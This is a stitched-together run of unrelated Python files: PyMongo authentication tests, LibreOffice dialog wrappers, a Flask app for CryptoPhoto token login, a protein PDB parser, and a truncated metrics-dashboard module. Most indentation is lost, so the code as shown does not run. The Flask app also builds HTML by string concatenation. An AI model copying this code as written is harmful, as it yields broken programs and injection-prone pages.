# OperationFailure raised upon connecting.
self.assertRaises(OperationFailure, bad_user.admin.command, 'ismaster')
self.assertRaises(OperationFailure, bad_pwd.admin.command, 'ismaster')
class TestSCRAMSHA1(unittest.TestCase):
@client_context.require_auth
@client_context.require_version_min(2, 7, 2)
def setUp(self):
self.replica_set_name = client_context.replica_set_name
# Before 2.7.7, SCRAM-SHA-1 had to be enabled from the command line.
if client_context.version < Version(2, 7, 7):
cmd_line = client_context.cmd_line
if 'SCRAM-SHA-1' not in cmd_line.get(
'parsed', {}).get('setParameter',
{}).get('authenticationMechanisms', ''):
raise SkipTest('SCRAM-SHA-1 mechanism not enabled')
client = client_context.rs_or_standalone_client
client.pymongo_test.add_user(
'user', 'pass',
roles=['userAdmin', 'readWrite'],
writeConcern={'w': client_context.w})
def test_scram_sha1(self):
client = MongoClient(host, port)
self.assertTrue(client.pymongo_test.authenticate(
'user', 'pass', mechanism='SCRAM-SHA-1'))
client.pymongo_test.command('dbstats')
client = MongoClient('mongodb://user:pass@%s:%d/pymongo_test'
'?authMechanism=SCRAM-SHA-1' % (host, port))
client.pymongo_test.command('dbstats')
if self.replica_set_name:
client = MongoClient(host, port,
replicaSet='%s' % (self.replica_set_name,))
self.assertTrue(client.pymongo_test.authenticate(
'user', 'pass', mechanism='SCRAM-SHA-1'))
client.pymongo_test.command('dbstats')
uri = ('mongodb://user:pass'
'@%s:%d/pymongo_test?authMechanism=SCRAM-SHA-1'
'&replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
client.pymongo_test.command('dbstats')
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
db.command('dbstats')
def tearDown(self):
client_context.rs_or_standalone_client.pymongo_test.remove_user('user')
class TestAuthURIOptions(unittest.TestCase):
@client_context.require_auth
def setUp(self):
client = MongoClient(host, port)
response = client.admin.command('ismaster')
self.replica_set_name = str(response.get('setName', ''))
client_context.client.admin.add_user('admin', 'pass',
roles=['userAdminAnyDatabase',
'dbAdminAnyDatabase',
'readWriteAnyDatabase',
'clusterAdmin'])
client.admin.authenticate('admin', 'pass')
client.pymongo_test.add_user('user', 'pass',
roles=['userAdmin', 'readWrite'])
if self.replica_set_name:
# GLE requires authentication.
client.admin.authenticate('admin', 'pass')
# Make sure the admin user is replicated after calling add_user
# above. This avoids a race in the replica set tests below.
client.admin.command('getLastError', w=len(response['hosts']))
self.client = client
def tearDown(self):
self.client.admin.authenticate('admin', 'pass')
self.client.pymongo_test.remove_user('user')
self.client.admin.remove_user('admin')
self.client.pymongo_test.logout()
self.client.admin.logout()
self.client = None
def test_uri_options(self):
# Test default to admin
client = MongoClient('mongodb://admin:pass@%s:%d' % (host, port))
self.assertTrue(client.admin.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://admin:pass'
'@%s:%d/?replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertTrue(client.admin.command('dbstats'))
db = client.get_database(
'admin', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
# Test explicit database
uri = 'mongodb://user:pass@%s:%d/pymongo_test' % (host, port)
client = MongoClient(uri)
self.assertRaises(OperationFailure, client.admin.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://user:pass@%s:%d'
'/pymongo_test?replicaSet=%s' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.admin.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
# Test authSource
uri = ('mongodb://user:pass@%s:%d'
'/pymongo_test2?authSource=pymongo_test' % (host, port))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.pymongo_test2.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
if self.replica_set_name:
uri = ('mongodb://user:pass@%s:%d/pymongo_test2?replicaSet='
'%s;authSource=pymongo_test' % (host, port, self.replica_set_name))
client = MongoClient(uri)
self.assertRaises(OperationFailure,
client.pymongo_test2.command, 'dbstats')
self.assertTrue(client.pymongo_test.command('dbstats'))
db = client.get_database(
'pymongo_test', read_preference=ReadPreference.SECONDARY)
self.assertTrue(db.command('dbstats'))
class TestDelegatedAuth(unittest.TestCase):
@client_context.require_auth
@client_context.require_version_max(2, 5, 3)
@client_context.require_version_min(2, 4, 0)
def setUp(self):
self.client = client_context.rs_or_standalone_client
def tearDown(self):
self.client.pymongo_test.remove_user('user')
self.client.pymongo_test2.remove_user('user')
self.client.pymongo_test2.foo.drop()
def test_delegated_auth(self):
self.client.pymongo_test2.foo.drop()
self.client.pymongo_test2.foo.insert_one({})
# User definition with no roles in pymongo_test.
self.client.pymongo_test.add_user('user', 'pass', roles=[])
# Delegate auth to pymongo_test.
self.client.pymongo_test2.add_user('user',
userSource='pymongo_test',
roles=['read'])
auth_c = MongoClient(host, port)
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
# Auth must occur on the db where the user is defined.
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.authenticate,
'user', 'pass')
# Auth directly
self.assertTrue(auth_c.pymongo_test.authenticate('user', 'pass'))
self.assertTrue(auth_c.pymongo_test2.foo.find_one())
auth_c.pymongo_test.logout()
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
# Auth using source
self.assertTrue(auth_c.pymongo_test2.authenticate(
'user', 'pass', source='pymongo_test'))
self.assertTrue(auth_c.pymongo_test2.foo.find_one())
# Must logout from the db authenticate was called on.
auth_c.pymongo_test2.logout()
self.assertRaises(OperationFailure,
auth_c.pymongo_test2.foo.find_one)
if __name__ == "__main__":
unittest.main()
# Copyright 2012 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bookmarks.values import PosSize
class BaseDialog(object):
""" Base class for all dialogs. """
def __init__(self, ctx, reuse=False, **kwds):
self.ctx = ctx
self.reuse = reuse
self.args = kwds
self.dialog = None
def _result(self):
""" Returns result of the dialog executed.
When canceled, None is returned. """
return None
def create_dialog(self):
""" Create instance of dialog for this dialog instance."""
pass
def _init(self):
""" Initialize something. """
pass
def _dispose(self):
""" Destruct dialog. """
pass
def execute(self):
""" Execute dialog and returns result. """
if self.dialog is None:
self.create_dialog()
self._init()
result = None
if self.dialog.execute():
result = self._result()
if not self.reuse:
self.dialog.dispose()
self.dialog = None
self._dispose()
return result
def create_service(self, name):
""" Instantiate servie. """
return self.ctx.getServiceManager().createInstanceWithContext(
name, self.ctx)
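# Subclasses are expected to provide create_dialog() and _result(); execute()
# then drives the lifecycle: create_dialog -> _init -> dialog.execute() ->
# _result -> dispose (unless reuse=True). A minimal sketch (hypothetical
# subclass; the FolderPicker service is reused here only for illustration):
#
#   class ExampleDialog(BaseDialog):
#       def create_dialog(self):
#           self.dialog = self.create_service(
#               "com.sun.star.ui.dialogs.FolderPicker")
#       def _result(self):
#           return self.dialog.getDirectory()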
class DialogBase(BaseDialog):
""" Base class for dialogs. """
WIDTH_DIALOG = 400
HEIGHT_DIALOG = 400
HEIGHT_LABEL = 25
HEIGHT_BUTTON = 25
HEIGHT_EDIT = 25
def __init__(self, ctx, res=None, reuse=False, **kwds):
BaseDialog.__init__(self, ctx, reuse, **kwds)
self.res = res
    def _(self, name):
        """ Get resource by name. """
        if self.res:
            return self.res.get(name, name)
        return name
def create_dialog(self):
self.dialog = self._create_dialog()
def _init(self):
pass
def get(self, name):
""" Get control from dialog. """
return self.dialog.getControl(name)
def set_focus(self, name):
self.get(name).setFocus()
def get_text(self, name):
""" Get text from control. """
return self.get(name).getModel().Text
def set_text(self, name, text):
""" Set text to the control having Text property. """
self.get(name).getModel().Text = text
def get_label(self, name):
""" Get label text from the control. """
return self.get(name).getModel().Label
def set_label(self, name, label):
""" Set label text to the control. """
self.get(name).getModel().Label = label
def select_text(self, name):
""" Select all text in the edit field. """
from com.sun.star.awt import Selection
self.get(name).setSelection(Selection(0, 1000))
def get_state(self, name):
""" Get state of check box. """
return self.get(name).getModel().State
def set_state(self, name, state):
""" Set state of checkbox. """
self.get(name).getModel().State = state
def set_enable(self, name, state):
self.get(name).setEnable(state)
class BuiltinDialog(BaseDialog):
""" Base class for wrapper dialogs of built-in dialogs.
_result and _init methods have to be implemented by subclass.
"""
SERVICE_NAME = None
    DEFAULT_TITLE = ""
NAME_TITLE = "title"
    def _set_title(self):
        """ Set the dialog title from args, falling back to the default title. """
        self.dialog.setTitle(self.args.get(self.NAME_TITLE, self.DEFAULT_TITLE))
def create_dialog(self):
""" Initialize dialog by SERVICE_NAME instance variable. """
self.dialog = self.create_service(self.SERVICE_NAME)
class FolderDialog(BuiltinDialog):
""" Let user to choose a folder. """
SERVICE_NAME = "com.sun.star.ui.dialogs.FolderPicker"
NAME_FOLDER = "directory"
NAME_DESCRIPTION = "description"
def _result(self):
return self.dialog.getDirectory()
def _init(self):
""" Initialize dialog. These keyword arguments can be
used to initialize dialog.
directory: initial directory.
        description: short description shown to help the user choose a folder.
"""
self._set_title()
dialog = self.dialog
args = self.args
if self.NAME_FOLDER in args:
dialog.setDisplayDirectory(args[self.NAME_FOLDER])
if self.NAME_DESCRIPTION in args:
dialog.setDescription(args[self.NAME_DESCRIPTION])
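# Usage sketch (assumes a valid UNO component context `ctx`); execute()
# returns the chosen directory URL, or None when the dialog is cancelled:
#
#   folder_url = FolderDialog(ctx,
#       title="Choose a folder",
#       directory="file:///tmp",
#       description="Select the target folder").execute()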
class FileDialogBase(BuiltinDialog):
""" Base class for file picker dialog. """
SERVICE_NAME = "com.sun.star.ui.dialogs.FilePicker"
INITIALIZE_TEMPLATE = 0
NAME_INITIALIZE = "initialize"
NAME_DIRECTORY = "directory"
NAME_MULTI = "multi"
NAME_DEFAULT = "default"
NAME_FILTERS = "filters"
NAME_CURRENT_FILTER = "current_filter"
NAME_HELP = "help"
NAME_FILTER_MANAGER = "filter_manager"
    def get_filter(self):
        """ Returns the currently selected filter. """
        try:
            return self.selected_filter
        except AttributeError:
            return self.dialog.getCurrentFilter()
def _result(self):
""" Returns selected file URLs.
When a file selected, simply an URL is returned.
Otherwise list of file URL is returned, all URL in
full length.
"""
self.selected_filter = self.get_filter()
files = self.dialog.getFiles()
if len(files) == 1:
return files[0]
else:
base_url = files[0]
return [base_url + "/" + name for name in files[1:]]
def _init(self):
""" Initialize filepicker dialog. Following keyword
arguments can be used to initialize.
"""
self._set_title()
self._init_type()
self._init_variables()
def _init_type(self):
dialog = self.dialog
args = self.args
if self.NAME_INITIALIZE in args:
initialize = args[self.NAME_INITIALIZE]
else:
initialize = self.INITIALIZE_TEMPLATE
dialog.initialize((initialize, ))
def _init_variables(self):
dialog = self.dialog
args = self.args
if self.NAME_DIRECTORY in args:
dialog.setDisplayDirectory(args[self.NAME_DIRECTORY])
if self.NAME_MULTI in args:
dialog.setMultiSelectionMode(args[self.NAME_MULTI])
if self.NAME_DEFAULT in args:
dialog.setDefaultName(args[self.NAME_DEFAULT])
if self.NAME_FILTERS in args:
filters = args[self.NAME_FILTERS]
for filter in filters:
dialog.appendFilter(filter[0], filter[1])
if self.NAME_CURRENT_FILTER in args:
dialog.setCurrentFilter(args[self.NAME_CURRENT_FILTER])
if self.NAME_HELP in args:
dialog.HelpURL = args[self.NAME_HELP]
if self.NAME_FILTER_MANAGER in args:
args[self.NAME_FILTER_MANAGER].set_filters(dialog)
from com.sun.star.ui.dialogs.TemplateDescription import \
FILEOPEN_SIMPLE as TD_FILEOPEN_SIMPLE, \
FILESAVE_SIMPLE as TD_FILESAVE_SIMPLE, \
FILESAVE_AUTOEXTENSION_SELECTION as TD_FILESAVE_AUTOEXTENSION_SELECTION
class FileOpenDialog(FileDialogBase):
""" Let user to choose files to open. """
INITIALIZE_TEMPLATE = TD_FILEOPEN_SIMPLE
class FileSaveDialog(FileDialogBase):
""" Let user to choose files to store. """
INITIALIZE_TEMPLATE = TD_FILESAVE_SIMPLE
from com.sun.star.ui.dialogs.ExtendedFilePickerElementIds import \
CHECKBOX_AUTOEXTENSION, CHECKBOX_SELECTION
class FileSaveAutoExtensionAndSelectionDialog(FileSaveDialog):
INITIALIZE_TEMPLATE = TD_FILESAVE_AUTOEXTENSION_SELECTION
def get_filter_extension(self):
filter = self.get_filter()
filters = self.args[self.NAME_FILTERS]
found = None
for f in filters:
if f[0] == filter:
found = f[1]
if found:
parts = found.split(";")
description = parts[0]
return description.strip("*")
return ""
def is_auto_extension_selected(self):
return self.dialog.getValue(CHECKBOX_AUTOEXTENSION, 0)
def is_selection_only_selected(self):
return self.dialog.getValue(CHECKBOX_SELECTION, 0)
def is_selection_only(self):
return self.selection_only
def _result(self):
""" Returns selected file URLs.
When a file selected, simply an URL is returned.
Otherwise list of file URL is returned, all URL in
full length.
"""
files = self.dialog.getFiles()
if len(files) == 1:
file_url = files[0]
else:
return None
self.selection_only = self.is_selection_only_selected()
if self.is_auto_extension_selected():
ext = self.get_filter_extension()
if ext and not file_url.endswith(ext):
file_url += ext
return file_url
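# Usage sketch for the file pickers (assumes a valid UNO component context
# `ctx`); each filter is a (UI label, wildcard pattern) pair passed to
# appendFilter, and execute() returns a URL, a list of URLs, or None:
#
#   url = FileOpenDialog(ctx,
#       title="Open file",
#       filters=(("All files (*.*)", "*.*"), ("Text files (*.txt)", "*.txt")),
#       current_filter="Text files (*.txt)").execute()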
# This is the HealthCraft GovHack 2017 entry from the high-fliers team.
from flask import Flask, render_template, request
import sys
from CryptoPhotoUtils import CryptoPhotoUtils
import urllib, hashlib, hmac, time, json, base64 # CryptoPhoto dependencies
import requests
app = Flask(__name__)
app.config.from_pyfile('config.cfg')
testv = app.config['FOO']
privatekey = app.config['CP_PRIVATEKEY']
publickey = app.config['CP_PUBLICKEY']
salt = app.config['CP_SALT']
test_uid = "12345" # This is the UserID of your customer. (It does not get revealed)
server = "https://cryptophoto.com"
cp = CryptoPhotoUtils(server, privatekey, publickey, test_uid)
# the root of the site
@app.route("/")
def index():
return render_template('index.html',test=testv)
@app.route("/signup", methods=['GET','POST'])
def signup():
if request.method == 'POST':
return do_the_signup()
else:
return render_template('signup.html')
def do_the_signup():
    # Adjust this to get the customer's IP address from your web server
    # environment (e.g. r = requests.get("http://curlmyip.com/"); ip = r.text)
    ip = request.remote_addr
print 'ip is %s\n' % (ip)
# Request a new CP session
rv = cp.start_session(ip)
if rv["is_valid"]:
print 'Session ID: %s \n' % (cp.session_id) # You need this for calls to CP
else:
print 'Error1: %s\n' % (rv["error"])
rv = cp.get_gen_widget()
if rv["is_valid"]:
print 'Generate Token Form: %s \n' % (rv["html"]) # This is HTML for your web page to use
else:
print 'Error2: %s\n' % (rv["error"])
# Request a new CP session
rv = cp.start_session(ip, True)
rv = cp.get_auth_widget()
if rv["is_valid"]:
print 'Auth Token Form: %s\n' % (rv["html"]) # So is this
else:
print 'Error3: %s\n' % (rv["error"])
# Verifies the response to a given challenge
    # This is just a demo of how the function should be used; without valid
    # parameters it will naturally return an error message. It is meant to
    # work when integrated with the login flow, where a real IP and valid
    # authentication codes are provided.
rv = cp.verify_response('selector', 'response_row', 'response_col', 'cp_phc', ip)
if rv["is_valid"]:
print 'Authenticated %s \n' % (rv["message"])
else:
print 'Error: %s\n' % (rv["error"])
return render_template('hello.html',test=testv)
@app.route("/account")
def account():
    ip = request.remote_addr
res = get_api_session(test_uid,ip)
display = ''
error = ''
sid = ''
if res['is_valid']:
sid = res['sid']
else:
error = res['error']
        if 'errdesc' in res:
error += res['errdesc']
if sid:
display = ("<div id='cp_widget'>Loading...</div>"
"<script type='text/javascript'"
"src='https://cryptophoto.com/api/token?sd=" + sid + "'>"
"</script>")
elif error:
display = "<div>Error: " + error + "</div>"
out = '''<html>
<head>
<meta charset="UTF-8">
<title>User Account</title>
</head>
<body>
<h2>Manage Your Token</h2>
{display}
</body>
</html>'''
out = out.format(display=display)
print 'out=%s\n' % (out)
return out # render_template('account.html',content = out)
@app.route("/main")
def main():
return render_template('main.html')
def get_api_session(uid, ip, authentication = False):
uid = hashlib.sha1(uid + salt).hexdigest()
t = int(time.time())
sign = hmac.new(privatekey, privatekey + str(t) + uid + publickey, hashlib.sha1).hexdigest()
postdata = {
'publickey' : publickey,
'uid' : uid,
'time' : t,
'signature' : sign,
'ip' : ip
}
if authentication:
postdata["authentication"] = "true"
response = urllib.urlopen("https://cryptophoto.com/api/get/session", urllib.urlencode(postdata))
ret = {}
if not response:
ret["is_valid"] = False
ret["error"] = "service-unavailable"
return ret
return_values = response.read().splitlines()
try:
if return_values[0] == 'success':
ret["is_valid"] = True
ret["sid"] = return_values[1]
ret["has_token"] = True if return_values[2] == 'true' else False
else:
ret["is_valid"] = False
ret["error"] = return_values[1]
ret["errip"] = return_values[3] if len(return_values) == 4 else ''
except:
ret["is_valid"] = False
ret["error"] = 'malformed-response'
return ret
def verify_cptv_response(POST):
ret = {}
if 'cpJWSrfc7515' not in POST:
ret["is_valid"] = False
ret["error"] = 'JWT token not provided'
return ret
postdata = {
'token': POST['cpJWSrfc7515']
}
response = urllib.urlopen("https://cryptophoto.com/api/verify/cptv.json", urllib.urlencode(postdata))
if not response:
ret["is_valid"] = False
ret["error"] = "service-unavailable"
return ret
return_value = response.read()
try:
obj = json.loads(return_value)
except:
ret["is_valid"] = False
ret["error"] = "CRYPTOPHOTO responded with invalid format"
return ret
if 'success' not in obj or not obj['success']:
ret["is_valid"] = False
ret["error"] = obj['description']
return ret
    jwt = POST['cpJWSrfc7515']
    tks = jwt.split('.')
payload = json.loads(base64.urlsafe_b64decode(tks[1]))
if not payload or 'fieldsOrder' not in payload or 'fieldsSha256' not in payload:
ret["is_valid"] = False
ret["error"] = 'JWT payload missing fields'
return ret
    fields = payload['fieldsOrder'].split(',')
shacontent = ''
for field in fields:
if field in POST and POST[field]:
shacontent += POST[field]
shacontent = base64.b64encode(hashlib.sha256(shacontent).digest())
fieldsSha256 = payload['fieldsSha256']
fieldsSha256 = fieldsSha256.rstrip('=')
shacontent = shacontent.rstrip('=')
if fieldsSha256 == shacontent:
ret["is_valid"] = True
else:
ret["is_valid"] = False
ret["error"] = 'POSTed field values have been changed'
return ret
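# A hedged sketch (the route and form handling here are hypothetical, not part
# of this app) of how verify_cptv_response could back a login POST handler:
#
#   @app.route("/login", methods=['POST'])
#   def login():
#       result = verify_cptv_response(request.form)
#       if result["is_valid"]:
#           return render_template('main.html')
#       return "Error: %s" % result["error"], 401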
# Do not change below
if __name__ == "__main__":
    if len(sys.argv) > 1:
        if sys.argv[1] == "--home":
app.run()
else:
app.run(host='0.0.0.0', port=443, ssl_context=('../healthcraft.crt', '../healthcraft.key'))
from entities.atom import Atom
from entities.hetatm import Hetatm
from entities.aminoacids import aminoacids
from numpy import matrix, dot, sqrt
from libraries.rotationMatrices import *
class PDB:
"""Please, take care of working with different models, I haven't checked it properly
For each entity in the PDB, the model number is stored
"""
def __init__(self, pdbFileName):
self.__file = open(pdbFileName, "r")
self.__fileName = pdbFileName
self.atoms = {}
self.hetatms = {}
self.__rest = {}
self.__numberOfLines = 0
self.__firstResidue = 0
self.residues = {}
self.intSeqRes = {}
self.CAlphas = {}
def load_atoms_hetams(self):
"""Loads every atom and hetam to its corresponding structure. The key of each line is its line number
Each atom/hetam holds the model it belongs to.
rest is for when only rotation or translation operations are performed.
"""
i = 0
modelNumber = 0
for line in self.__file:
if line.startswith("ENDMDL"):
modelNumber+=1
self.__rest[i] = line
else:
if line.startswith("ATOM"):
self.atoms[i] = Atom(line,modelNumber)
else:
if line.startswith("HETATM"):
self.hetatms[i]= Hetatm(line,modelNumber)
else:
if not line.isspace():
self.__rest[i] = line
i+=1
self.__numberOfLines = i
self.__file.close()
#To extract the atoms of a residue
if len(self.atoms)>0:
firstAtomOrder = min(self.atoms.keys())
self.__firstResidue = (self.atoms[firstAtomOrder].resSeq,self.atoms[firstAtomOrder].iCode)
#print "atoms " + str(len(self.atoms))
#print "hetatms " + str(len(self.hetatms))
#print "rest " + str(len(self.__rest))
def serialize(self, newPDBfileName):
"""This method doesn't consider the model """
newFile = open(newPDBfileName, "w")
i = 0
while i < self.__numberOfLines:
if self.atoms.get(i):
newFile.write(self.atoms.get(i).toString())
newFile.write("\n")
else:
if self.hetatms.get(i):
newFile.write(self.hetatms.get(i).toString())
newFile.write("\n")
else:
if self.__rest.get(i):
newFile.write(self.__rest.get(i))
i+=1
newFile.close()
def shift(self, vector):
"""Adds vector to every atom and hetatm coordinates"""
for a in self.atoms.values():
a.shift(vector)
for h in self.hetatms.values():
h.shift(vector)
def rotate(self, rotationMatrix, center):
""" Rotates every atom considering center as the center of rotation"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
def chimera_transform(self, center, rotationMatrix, shift):
"""For each atom, hetatm is first centered in the center of coordinates, then rotated, then shifted, and finally recentered
transform = lambda atom, center, shift, rotationMatrix: rotationMatrix*(atom - center)+shift+center
"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
a.shift(shift+center)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
h.shift(shift+center)
def ash_transform(self, center, rotationMatrix, shift):
"""For each atom, hetatm is first centered in the center of coordinates, then rotated an finally shifted
transform = lambda atom, center, shift, rotationMatrix: rotationMatrix*(atom - center)+shift
"""
for a in self.atoms.values():
a.center(center)
a.rotate(rotationMatrix)
a.shift(shift)
for h in self.hetatms.values():
h.center(center)
h.rotate(rotationMatrix)
h.shift(shift)
def itk_transform(self, matrix, shift):
for a in self.atoms.values():
a.itk_ops(matrix, shift)
for h in self.hetatms.values():
h.itk_ops(matrix, shift)
def getHighestOccupancyLocation(self, anAtom):
"""Some of the atoms of the residue can have an unique conformation (== ' ') and so an occupancy factor or 1
This algorithm returns the location with highest occupancy
"""
occupancy = anAtom.occupancy
location = anAtom.altLoc
for atom in self.atoms.values():
if anAtom.model == atom.model:
if anAtom.resSeq == atom.resSeq:
if atom.altLoc != anAtom.altLoc:
if atom.altLoc != ' ' and atom.occupancy > anAtom.occupancy:
occupancy = atom.occupancy
location = atom.altLoc
return location
def getAtomsFromSegment(self,chain, start, stop, startInsertion, stopInsertion, startOrder, stopOrder, model=0, onlyBackbone=False):
""" returns a dictionary of the atoms of the backbone in a chain in a segment
Please, take into account that the atoms are NOT stored in ORDER. Those are in a dictionary
The atoms that not fulfil the conditions are not included in the dictionary
"""
segmentAtoms = {}
highestAltLocation = ''
for (lineNumber,atom) in self.atoms.items():
if atom.inModel(model):
if atom.inChain(chain):
if atom.inInsertionsSegment(start, stop,startInsertion, stopInsertion, startOrder, stopOrder):
if onlyBackbone and atom.inBackbone():
if atom.hasAlternateLocations():
highestAltLocation = self.getHighestOccupancyLocation(atom)
if atom.inhighestConformation(highestAltLocation):
segmentAtoms[lineNumber] = atom
else:
segmentAtoms[lineNumber] = atom
else:
if atom.hasAlternateLocations():
highestAltLocation = self.getHighestOccupancyLocation(atom)
if atom.inhighestConformation(highestAltLocation):
segmentAtoms[lineNumber] = atom
else:
segmentAtoms[lineNumber] = atom
return segmentAtoms
def getAtomsFromDomain(self, segments, model=0, onlyBackbone=False):
"""returns a set of the atoms of the backbone or all in a chain for every segment of the domain
segments = ((chain, start, stop, startInsertion, stopInsertion))
"""
domainAtoms = []
for segment in segments:
startOrder = self.orderOfInsertions(segment[1])
stopOrder = self.orderOfInsertions(segment[2])
domainAtoms.append(self.getAtomsFromSegment(segment[0], int(segment[1]),int(segment[2]),segment[3],segment[4],startOrder, stopOrder, model, onlyBackbone))
return domainAtoms
def getRestForSegments(self, segments):
"""@TODO Get the rest of the structures to compose a pdb """
pass
def serializeSegments(self, segments, domainFileName, model=0,onlyBackbone=False):
"""Stores the selected segments of the pdb in the domainFileName.
The segments structure is a list -segments = []- composed by -segments.append() - a (chain, start, stop) segments
A new serial for each atom is set. If more than 1 model is found, the first model is used.
"""
file = open(domainFileName, "w")
domains = self.getAtomsFromDomain(segments,model,onlyBackbone)
newSerial = 1
for segment in domains:
orderedKeys = segment.keys()
orderedKeys.sort()
for lineNumber in orderedKeys:
file.write("%s\n" %(segment[lineNumber].toString(newSerial),))
newSerial+=1
file.write("%s\n" % ("END"+77*" ", ))
file.close()
def centerOfMass(self,model=0):
"""This method considers only the atoms in a model"""
cm = matrix([0.0, 0.0, 0.0]).T
weight = 0.0
for a in self.atoms.values():
if a.inModel(model):
cm += a.atomicWeight()*a.coordinates
weight+= a.atomicWeight()
return cm/weight
def sphereRadius(self,model=0):
"""returns the radius of the sphere the pdb is contained, and the center of mass """
cm = self.centerOfMass(model)
radius = 0.0
for a in self.atoms.values():
if a.inModel(model):
dist_vector = (a.coordinates - cm).A.ravel()
distance = sqrt(dot(dist_vector,dist_vector))
print distance
if distance > radius:
radius = distance
return (cm, radius)
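    # A minimal standalone check of the distance formula used above (assumes the same
    # numpy names -- matrix, sqrt, dot -- that this module already relies on):
    #
    #   cm = matrix([0.0, 0.0, 0.0]).T
    #   p = matrix([3.0, 4.0, 0.0]).T
    #   d = (p - cm).A.ravel()
    #   sqrt(dot(d, d))    # -> 5.0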
def orderOfInsertions(self, resSeq):
"""The order of the insertions is defined as the backwards or forwards alphasbetical order that is A,B,C ... or ...C, B, A
to do this, a couple of consecutive atoms sharing the order, with an iCode != '' are found, and after that, the order is determined.
True if the order is from A to Z False otherwise.
"""
firstAtom = None
for atom in self.atoms.values():
if atom.resSeq == resSeq and atom.iCode != '' and firstAtom is None:
firstAtom = atom
continue
if firstAtom is not None and atom.resSeq == resSeq and atom.iCode !='' and firstAtom.iCode != atom.iCode:
return firstAtom.iCode < atom.iCode
else:
firstAtom = None
return True
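    # Illustrative reading of the return value (residue numbering is made up): for
    # inserted residues 100A, 100B seen in that order (iCodes increasing alphabetically)
    # the method returns True; for 100B, 100A it returns False; and if no insertion
    # codes are present for resSeq it defaults to True.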
def fasta(self, fastaFileName, model=0):
"""generates a fasta file of the pdb selecting the aminoacids of the atoms in the model and /or in the backbone """
fastaFile = open(fastaFileName,"w")
fastaFile.write(">%s Model %d \n" % (self.__fileName, model))
keys = self.atoms.keys()
keys.sort()
resSeq = -1
iCode = ''
currentLine = []
for line in keys:
            if self.atoms[line].inModel(model):
if self.atoms[line].resSeq != resSeq or self.atoms[line].iCode != iCode:
if len(currentLine) < 79:
currentLine.append(aminoacids[self.atoms[line].residue])
else:
currentLine.append(aminoacids[self.atoms[line].residue])
fastaFile.write("%s\n" % ''.join(currentLine))
currentLine = []
resSeq = self.atoms[line].resSeq
iCode = self.atoms[line].iCode
fastaFile.write("%s\n" % ''.join(currentLine))
fastaFile.close()
def getAtomsFromResidue(self, intSeqRes):
""""Returns the atoms associated with a residue. The intResSeq parameter is the order the residue occupies in its pdb,
considering the iCodes (insertion codes).LoadResidues and LoadIntSeqRes methods must be called before using getAtomsFromResidue"""
atoms = []
residue = self.getIntSeqRes(intSeqRes)
for atom in self.atoms.values():
if atom.getResidue() == residue:
atoms.append(atom)
return atoms
def getCAlphaFromResidue(self, intSeqRes):
"""Returns the CAlpha of the residue.The intResSeq parameter is the order the residue occupies in its pdb,
considering the iCodes (insertion codes).LoadResidues and LoadIntSeqRes methods must be called before using getAtomsFromResidue"""
residue = self.getIntSeqRes(intSeqRes)
for atom in self.atoms.values():
if atom.isCAlpha() and atom.getResidue() == residue:
return atom
def getFirstResidue(self):
"""returns the first residue in the pdb defined as the (atom.SeqRes,atom.iCode) """
return self.__firstResidue
def getIntSeqRes(self, intSeqRes):
"""Returns the residue defined as (atom.seqRes, atom.iCode) """
return self.intSeqRes.get(intSeqRes)
def loadIntSeqRes(self):
"""to work, loadResidues must be called before"""
for (key, value) in self.residues.items():
self.intSeqRes[value] = key
def loadResidues(self):
"""loads the residues of the pdb, defining a residue as (atom.seqRes, atom.iCode) for any different combination in the pdb """
intResSeq = 0
for atom in self.atoms.values():
if not self.residues.has_key(atom.getResidue()):
self.residues[atom.getResidue()]= intResSeq
intResSeq+=1
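    # Call-order sketch (hedged; `structure` stands for an instance of this class,
    # however it was constructed):
    #
    #   structure.loadResidues()
    #   structure.loadIntSeqRes()
    #   atoms = structure.getAtomsFromResidue(0)     # all atoms of the first residue
    #   calpha = structure.getCAlphaFromResidue(0)   # its C-alpha, if any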
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import math
import os
from absl import logging
from bokeh.layouts import column, row
from bokeh.models import CategoricalColorMapper, ColumnDataSource, Div, HoverTool
from bokeh.plotting import figure
import javascript_utils
import utils
import numpy as np
# For a given list of test_names and metric_names, find the history of metrics.
QUERY = """
SELECT
metrics.test_name,
metrics.metric_name,
SAFE_CAST(DATE(metrics.timestamp, 'US/Pacific') AS STRING) AS run_date,
metrics.metric_value,
job.job_status,
job.stackdriver_logs_link AS logs_link,
job.logs_download_command,
job.uuid
FROM (
SELECT
x.test_name,
x.metric_name,
x.timestamp,
x.metric_value,
x.uuid
FROM (
SELECT
test_name,
metric_name,
